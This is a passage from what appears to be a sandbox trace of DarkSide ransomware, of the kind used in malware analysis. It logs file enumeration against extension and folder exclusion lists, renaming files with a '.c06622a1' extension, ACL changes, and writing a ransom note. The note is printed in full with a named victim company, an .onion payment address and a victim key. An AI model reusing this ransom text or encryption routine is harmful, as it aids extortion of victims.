(_Str1="ntuser.dat.log", _Str2="rL-yOwn0ZZgZddUS.pptx") returned -4 [0158.476] wcslen (_String="ntuser.dat.log") returned 0xe [0158.476] _wcsicmp (_Str1="ntuser.ini", _Str2="rL-yOwn0ZZgZddUS.pptx") returned -4 [0158.477] wcslen (_String="ntuser.ini") returned 0xa [0158.477] _wcsicmp (_Str1="thumbs.db", _Str2="rL-yOwn0ZZgZddUS.pptx") returned 2 [0158.477] wcslen (_String="thumbs.db") returned 0x9 [0158.477] _wcsicmp (_Str1="386", _Str2="pptx") returned -61 [0158.477] wcslen (_String="386") returned 0x3 [0158.477] _wcsicmp (_Str1="adv", _Str2="pptx") returned -15 [0158.477] wcslen (_String="adv") returned 0x3 [0158.477] _wcsicmp (_Str1="ani", _Str2="pptx") returned -15 [0158.477] wcslen (_String="ani") returned 0x3 [0158.477] _wcsicmp (_Str1="bat", _Str2="pptx") returned -14 [0158.477] wcslen (_String="bat") returned 0x3 [0158.477] _wcsicmp (_Str1="bin", _Str2="pptx") returned -14 [0158.477] wcslen (_String="bin") returned 0x3 [0158.477] _wcsicmp (_Str1="cab", _Str2="pptx") returned -13 [0158.477] wcslen (_String="cab") returned 0x3 [0158.477] _wcsicmp (_Str1="cmd", _Str2="pptx") returned -13 [0158.477] wcslen (_String="cmd") returned 0x3 [0158.477] _wcsicmp (_Str1="com", _Str2="pptx") returned -13 [0158.477] wcslen (_String="com") returned 0x3 [0158.477] _wcsicmp (_Str1="cpl", _Str2="pptx") returned -13 [0158.477] wcslen (_String="cpl") returned 0x3 [0158.477] _wcsicmp (_Str1="cur", _Str2="pptx") returned -13 [0158.477] wcslen (_String="cur") returned 0x3 [0158.477] _wcsicmp (_Str1="deskthemepack", _Str2="pptx") returned -12 [0158.477] wcslen (_String="deskthemepack") returned 0xd [0158.477] _wcsicmp (_Str1="diagcab", _Str2="pptx") returned -12 [0158.477] wcslen (_String="diagcab") returned 0x7 [0158.477] _wcsicmp (_Str1="diagcfg", _Str2="pptx") returned -12 [0158.477] wcslen (_String="diagcfg") returned 0x7 [0158.477] _wcsicmp (_Str1="diagpkg", _Str2="pptx") returned -12 [0158.477] wcslen (_String="diagpkg") returned 0x7 [0158.477] _wcsicmp (_Str1="dll", _Str2="pptx") returned -12 [0158.477] wcslen (_String="dll") returned 0x3 [0158.477] _wcsicmp (_Str1="drv", _Str2="pptx") returned -12 [0158.477] wcslen (_String="drv") returned 0x3 [0158.477] _wcsicmp (_Str1="exe", _Str2="pptx") returned -11 [0158.478] wcslen (_String="exe") returned 0x3 [0158.478] _wcsicmp (_Str1="hlp", _Str2="pptx") returned -8 [0158.478] wcslen (_String="hlp") returned 0x3 [0158.478] _wcsicmp (_Str1="icl", _Str2="pptx") returned -7 [0158.478] wcslen (_String="icl") returned 0x3 [0158.478] _wcsicmp (_Str1="icns", _Str2="pptx") returned -7 [0158.478] wcslen (_String="icns") returned 0x4 [0158.478] _wcsicmp (_Str1="ico", _Str2="pptx") returned -7 [0158.478] wcslen (_String="ico") returned 0x3 [0158.478] _wcsicmp (_Str1="ics", _Str2="pptx") returned -7 [0158.478] wcslen (_String="ics") returned 0x3 [0158.478] _wcsicmp (_Str1="idx", _Str2="pptx") returned -7 [0158.478] wcslen (_String="idx") returned 0x3 [0158.478] _wcsicmp (_Str1="ldf", _Str2="pptx") returned -4 [0158.478] wcslen (_String="ldf") returned 0x3 [0158.478] _wcsicmp (_Str1="lnk", _Str2="pptx") returned -4 [0158.478] wcslen (_String="lnk") returned 0x3 [0158.478] _wcsicmp (_Str1="mod", _Str2="pptx") returned -3 [0158.478] wcslen (_String="mod") returned 0x3 [0158.478] _wcsicmp (_Str1="mpa", _Str2="pptx") returned -3 [0158.478] wcslen (_String="mpa") returned 0x3 [0158.478] _wcsicmp (_Str1="msc", _Str2="pptx") returned -3 [0158.478] wcslen (_String="msc") returned 0x3 [0158.478] _wcsicmp (_Str1="msp", _Str2="pptx") returned -3 [0158.478] wcslen (_String="msp") returned 0x3 [0158.478] _wcsicmp (_Str1="msstyles", _Str2="pptx") returned -3 [0158.478] wcslen (_String="msstyles") returned 0x8 [0158.478] _wcsicmp (_Str1="msu", _Str2="pptx") returned -3 [0158.478] wcslen (_String="msu") returned 0x3 [0158.478] _wcsicmp (_Str1="nls", _Str2="pptx") returned -2 [0158.478] wcslen (_String="nls") returned 0x3 [0158.478] _wcsicmp (_Str1="nomedia", _Str2="pptx") returned -2 [0158.478] wcslen (_String="nomedia") returned 0x7 [0158.478] _wcsicmp (_Str1="ocx", _Str2="pptx") returned -1 [0158.478] wcslen (_String="ocx") returned 0x3 [0158.478] _wcsicmp (_Str1="prf", _Str2="pptx") returned 2 [0158.478] wcslen (_String="prf") returned 0x3 [0158.479] _wcsicmp (_Str1="ps1", _Str2="pptx") returned 3 [0158.479] wcslen (_String="ps1") returned 0x3 [0158.479] _wcsicmp (_Str1="rom", _Str2="pptx") returned 2 [0158.479] wcslen (_String="rom") returned 0x3 [0158.479] _wcsicmp (_Str1="rtp", _Str2="pptx") returned 2 [0158.479] wcslen (_String="rtp") returned 0x3 [0158.479] _wcsicmp (_Str1="scr", _Str2="pptx") returned 3 [0158.479] wcslen (_String="scr") returned 0x3 [0158.479] _wcsicmp (_Str1="shs", _Str2="pptx") returned 3 [0158.479] wcslen (_String="shs") returned 0x3 [0158.479] _wcsicmp (_Str1="spl", _Str2="pptx") returned 3 [0158.479] wcslen (_String="spl") returned 0x3 [0158.479] _wcsicmp (_Str1="sys", _Str2="pptx") returned 3 [0158.479] wcslen (_String="sys") returned 0x3 [0158.479] _wcsicmp (_Str1="theme", _Str2="pptx") returned 4 [0158.479] wcslen (_String="theme") returned 0x5 [0158.479] _wcsicmp (_Str1="themepack", _Str2="pptx") returned 4 [0158.479] wcslen (_String="themepack") returned 0x9 [0158.479] _wcsicmp (_Str1="wpx", _Str2="pptx") returned 7 [0158.479] wcslen (_String="wpx") returned 0x3 [0158.479] _wcsicmp (_Str1="lock", _Str2="pptx") returned -4 [0158.479] wcslen (_String="lock") returned 0x4 [0158.479] _wcsicmp (_Str1="key", _Str2="pptx") returned -5 [0158.479] wcslen (_String="key") returned 0x3 [0158.479] _wcsicmp (_Str1="hta", _Str2="pptx") returned -8 [0158.479] wcslen (_String="hta") returned 0x3 [0158.479] _wcsicmp (_Str1="msi", _Str2="pptx") returned -3 [0158.479] wcslen (_String="msi") returned 0x3 [0158.479] _wcsicmp (_Str1="pdb", _Str2="pptx") returned -12 [0158.479] wcslen (_String="pdb") returned 0x3 [0158.479] _wcsicmp (_Str1="sqlite", _Str2="pptx") returned 3 [0158.479] wcslen (_String="sqlite") returned 0x6 [0158.479] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\88lx_mh5lppm")) returned 0x10 [0158.480] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32a0090 [0158.480] wcscpy (in: _Dest=0x32a0090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm" [0158.480] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm") returned 0x53 [0158.480] wcscpy (in: _Dest=0x32a0138, _Source="rL-yOwn0ZZgZddUS.pptx" | out: _Dest="rL-yOwn0ZZgZddUS.pptx") returned="rL-yOwn0ZZgZddUS.pptx" [0158.480] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\rL-yOwn0ZZgZddUS.pptx", dwFileAttributes=0x80) returned 1 [0158.480] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\rL-yOwn0ZZgZddUS.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\88lx_mh5lppm\\rl-yown0zzgzddus.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0158.480] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.480] ReadFile (in: hFile=0x1b4, lpBuffer=0x32e4a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e534, lpOverlapped=0x0 | out: lpBuffer=0x32e4a4*, lpNumberOfBytesRead=0x32e534*=0x90, lpOverlapped=0x0) returned 1 [0158.481] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e4a4, Length=0x80) returned 0xe7a79edf [0158.481] RtlComputeCrc32 (PartialCrc=0x9edf, Buffer=0x32e4a4, Length=0x80) returned 0x4a76464e [0158.481] RtlComputeCrc32 (PartialCrc=0x464e, Buffer=0x32e4a4, Length=0x80) returned 0xeb8d7de7 [0158.481] RtlComputeCrc32 (PartialCrc=0x7de7, Buffer=0x32e4a4, Length=0x80) returned 0x459321a4 [0158.481] RtlComputeCrc32 (PartialCrc=0x21a4, Buffer=0x32e4a4, Length=0x80) returned 0x7a5492d2 [0158.481] CloseHandle (hObject=0x1b4) returned 1 [0158.481] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32b0098 [0158.481] wcscpy (in: _Dest=0x32b0098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\rL-yOwn0ZZgZddUS.pptx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\rL-yOwn0ZZgZddUS.pptx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\rL-yOwn0ZZgZddUS.pptx" [0158.481] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\rL-yOwn0ZZgZddUS.pptx") returned 0x69 [0158.481] wcscpy (in: _Dest=0x32b016a, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0158.481] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\rL-yOwn0ZZgZddUS.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\88lx_mh5lppm\\rl-yown0zzgzddus.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\rL-yOwn0ZZgZddUS.pptx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\88lx_mh5lppm\\rl-yown0zzgzddus.pptx.c06622a1"), dwFlags=0x8) returned 1 [0158.484] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\rL-yOwn0ZZgZddUS.pptx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\88lx_mh5lppm\\rl-yown0zzgzddus.pptx.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1b4 [0158.484] CreateIoCompletionPort (FileHandle=0x1b4, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0158.484] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3900020 [0158.491] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x50b089eb [0158.491] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x53dc7458 [0158.491] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6b6ea216 [0158.491] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3514b63c [0158.491] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4e03c686 [0158.491] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7149c5ac [0158.491] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3a848723 [0158.491] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7340f779 [0158.494] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3900094, Length=0x80) returned 0xf3aa44b2 [0158.495] RtlComputeCrc32 (PartialCrc=0x44b2, Buffer=0x3900094, Length=0x80) returned 0x63e32219 [0158.495] RtlComputeCrc32 (PartialCrc=0x2219, Buffer=0x3900094, Length=0x80) returned 0xddd49135 [0158.495] RtlComputeCrc32 (PartialCrc=0x9135, Buffer=0x3900094, Length=0x80) returned 0x5083c56a [0158.495] RtlComputeCrc32 (PartialCrc=0xc56a, Buffer=0x3900094, Length=0x80) returned 0x845ba9e3 [0158.495] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3900020) returned 1 [0158.495] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32a0090) returned 1 [0158.495] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32b0098) returned 1 [0158.495] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3c2abaf0, ftCreationTime.dwHighDateTime=0x1d5d834, ftLastAccessTime.dwLowDateTime=0xffd4b150, ftLastAccessTime.dwHighDateTime=0x1d5dc93, ftLastWriteTime.dwLowDateTime=0xffd4b150, ftLastWriteTime.dwHighDateTime=0x1d5dc93, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uU3Lzd - buLe2_", cAlternateFileName="UU3LZD~1")) returned 1 [0158.495] _wcsicmp (_Str1="$recycle.bin", _Str2="uU3Lzd - buLe2_") returned -81 [0158.495] wcslen (_String="$recycle.bin") returned 0xc [0158.495] _wcsicmp (_Str1="config.msi", _Str2="uU3Lzd - buLe2_") returned -18 [0158.495] wcslen (_String="config.msi") returned 0xa [0158.495] _wcsicmp (_Str1="$windows.~bt", _Str2="uU3Lzd - buLe2_") returned -81 [0158.495] wcslen (_String="$windows.~bt") returned 0xc [0158.495] _wcsicmp (_Str1="$windows.~ws", _Str2="uU3Lzd - buLe2_") returned -81 [0158.495] wcslen (_String="$windows.~ws") returned 0xc [0158.495] _wcsicmp (_Str1="windows", _Str2="uU3Lzd - buLe2_") returned 2 [0158.495] wcslen (_String="windows") returned 0x7 [0158.495] _wcsicmp (_Str1="appdata", _Str2="uU3Lzd - buLe2_") returned -20 [0158.495] wcslen (_String="appdata") returned 0x7 [0158.495] _wcsicmp (_Str1="application data", _Str2="uU3Lzd - buLe2_") returned -20 [0158.495] wcslen (_String="application data") returned 0x10 [0158.495] _wcsicmp (_Str1="boot", _Str2="uU3Lzd - buLe2_") returned -19 [0158.495] wcslen (_String="boot") returned 0x4 [0158.495] _wcsicmp (_Str1="google", _Str2="uU3Lzd - buLe2_") returned -14 [0158.495] wcslen (_String="google") returned 0x6 [0158.495] _wcsicmp (_Str1="mozilla", _Str2="uU3Lzd - buLe2_") returned -8 [0158.495] wcslen (_String="mozilla") returned 0x7 [0158.495] _wcsicmp (_Str1="program files", _Str2="uU3Lzd - buLe2_") returned -5 [0158.496] wcslen (_String="program files") returned 0xd [0158.496] _wcsicmp (_Str1="program files (x86)", _Str2="uU3Lzd - buLe2_") returned -5 [0158.496] wcslen (_String="program files (x86)") returned 0x13 [0158.496] _wcsicmp (_Str1="programdata", _Str2="uU3Lzd - buLe2_") returned -5 [0158.496] wcslen (_String="programdata") returned 0xb [0158.496] _wcsicmp (_Str1="system volume information", _Str2="uU3Lzd - buLe2_") returned -2 [0158.496] wcslen (_String="system volume information") returned 0x19 [0158.496] _wcsicmp (_Str1="tor browser", _Str2="uU3Lzd - buLe2_") returned -1 [0158.496] wcslen (_String="tor browser") returned 0xb [0158.496] _wcsicmp (_Str1="windows.old", _Str2="uU3Lzd - buLe2_") returned 2 [0158.496] wcslen (_String="windows.old") returned 0xb [0158.496] _wcsicmp (_Str1="intel", _Str2="uU3Lzd - buLe2_") returned -12 [0158.496] wcslen (_String="intel") returned 0x5 [0158.496] _wcsicmp (_Str1="msocache", _Str2="uU3Lzd - buLe2_") returned -8 [0158.496] wcslen (_String="msocache") returned 0x8 [0158.496] _wcsicmp (_Str1="perflogs", _Str2="uU3Lzd - buLe2_") returned -5 [0158.496] wcslen (_String="perflogs") returned 0x8 [0158.496] _wcsicmp (_Str1="x64dbg", _Str2="uU3Lzd - buLe2_") returned 3 [0158.496] wcslen (_String="x64dbg") returned 0x6 [0158.496] _wcsicmp (_Str1="public", _Str2="uU3Lzd - buLe2_") returned -5 [0158.496] wcslen (_String="public") returned 0x6 [0158.496] _wcsicmp (_Str1="all users", _Str2="uU3Lzd - buLe2_") returned -20 [0158.496] wcslen (_String="all users") returned 0x9 [0158.496] _wcsicmp (_Str1="default", _Str2="uU3Lzd - buLe2_") returned -17 [0158.496] wcslen (_String="default") returned 0x7 [0158.496] wcscpy (in: _Dest=0x3280080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\*" [0158.496] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\*") returned 0x55 [0158.496] wcscpy (in: _Dest=0x3280128, _Source="uU3Lzd - buLe2_" | out: _Dest="uU3Lzd - buLe2_") returned="uU3Lzd - buLe2_" [0158.496] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32a0090 [0158.496] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32b0098 [0158.498] wcscpy (in: _Dest=0x32a0090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\uU3Lzd - buLe2_" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\uU3Lzd - buLe2_") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\uU3Lzd - buLe2_" [0158.498] GetNamedSecurityInfoW () returned 0x0 [0158.498] SetEntriesInAclW () returned 0x0 [0158.498] SetNamedSecurityInfoW () returned 0x0 [0158.500] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x22b168) returned 1 [0158.500] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32e16c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0158.500] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\uU3Lzd - buLe2_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\88lx_mh5lppm\\uu3lzd - bule2_")) returned 1 [0158.500] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0158.500] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\88lx_mh5lppm\\uu3lzd - bule2_\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0158.500] WriteFile (in: hFile=0x1a4, lpBuffer=0x17dc98*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x32e13c, lpOverlapped=0x0 | out: lpBuffer=0x17dc98*, lpNumberOfBytesWritten=0x32e13c*=0x7ca, lpOverlapped=0x0) returned 1 [0158.501] CloseHandle (hObject=0x1a4) returned 1 [0158.501] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0158.502] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\uU3Lzd - buLe2_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\88lx_mh5lppm\\uu3lzd - bule2_")) returned 0x10 [0158.502] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\uU3Lzd - buLe2_" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\uU3Lzd - buLe2_\\") returned="" [0158.502] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\uU3Lzd - buLe2_\\") returned 0x64 [0158.502] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\uU3Lzd - buLe2_\\*", fInfoLevelId=0x0, lpFindFileData=0x32e39c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32e39c) returned 0x154248 [0158.502] FindNextFileW (in: hFindFile=0x154248, lpFindFileData=0x32e39c | out: lpFindFileData=0x32e39c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3c2abaf0, ftCreationTime.dwHighDateTime=0x1d5d834, ftLastAccessTime.dwLowDateTime=0x8c2bb4e0, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8c2bb4e0, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.503] FindNextFileW (in: hFindFile=0x154248, lpFindFileData=0x32e39c | out: lpFindFileData=0x32e39c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71a16f60, ftCreationTime.dwHighDateTime=0x1d5e466, ftLastAccessTime.dwLowDateTime=0x8e08cf00, ftLastAccessTime.dwHighDateTime=0x1d5e6c7, ftLastWriteTime.dwLowDateTime=0x8e08cf00, ftLastWriteTime.dwHighDateTime=0x1d5e6c7, nFileSizeHigh=0x0, nFileSizeLow=0x15520, dwReserved0=0x0, dwReserved1=0x0, cFileName="3 TEqrmP4SFdFZ164.ods", cAlternateFileName="3TEQRM~1.ODS")) returned 1 [0158.503] _wcsicmp (_Str1="3 TEqrmP4SFdFZ164.ods", _Str2="README.c06622a1.TXT") returned -63 [0158.503] wcsstr (_Str="3 TEqrmP4SFdFZ164.ods", _SubStr="README") returned 0x0 [0158.503] _wcsicmp (_Str1="autorun.inf", _Str2="3 TEqrmP4SFdFZ164.ods") returned 46 [0158.503] wcslen (_String="autorun.inf") returned 0xb [0158.503] _wcsicmp (_Str1="boot.ini", _Str2="3 TEqrmP4SFdFZ164.ods") returned 47 [0158.503] wcslen (_String="boot.ini") returned 0x8 [0158.503] _wcsicmp (_Str1="bootfont.bin", _Str2="3 TEqrmP4SFdFZ164.ods") returned 47 [0158.503] wcslen (_String="bootfont.bin") returned 0xc [0158.503] _wcsicmp (_Str1="bootsect.bak", _Str2="3 TEqrmP4SFdFZ164.ods") returned 47 [0158.503] wcslen (_String="bootsect.bak") returned 0xc [0158.503] _wcsicmp (_Str1="desktop.ini", _Str2="3 TEqrmP4SFdFZ164.ods") returned 49 [0158.503] wcslen (_String="desktop.ini") returned 0xb [0158.503] _wcsicmp (_Str1="iconcache.db", _Str2="3 TEqrmP4SFdFZ164.ods") returned 54 [0158.503] wcslen (_String="iconcache.db") returned 0xc [0158.503] _wcsicmp (_Str1="ntldr", _Str2="3 TEqrmP4SFdFZ164.ods") returned 59 [0158.503] wcslen (_String="ntldr") returned 0x5 [0158.503] _wcsicmp (_Str1="ntuser.dat", _Str2="3 TEqrmP4SFdFZ164.ods") returned 59 [0158.503] wcslen (_String="ntuser.dat") returned 0xa [0158.503] _wcsicmp (_Str1="ntuser.dat.log", _Str2="3 TEqrmP4SFdFZ164.ods") returned 59 [0158.503] wcslen (_String="ntuser.dat.log") returned 0xe [0158.503] _wcsicmp (_Str1="ntuser.ini", _Str2="3 TEqrmP4SFdFZ164.ods") returned 59 [0158.503] wcslen (_String="ntuser.ini") returned 0xa [0158.503] _wcsicmp (_Str1="thumbs.db", _Str2="3 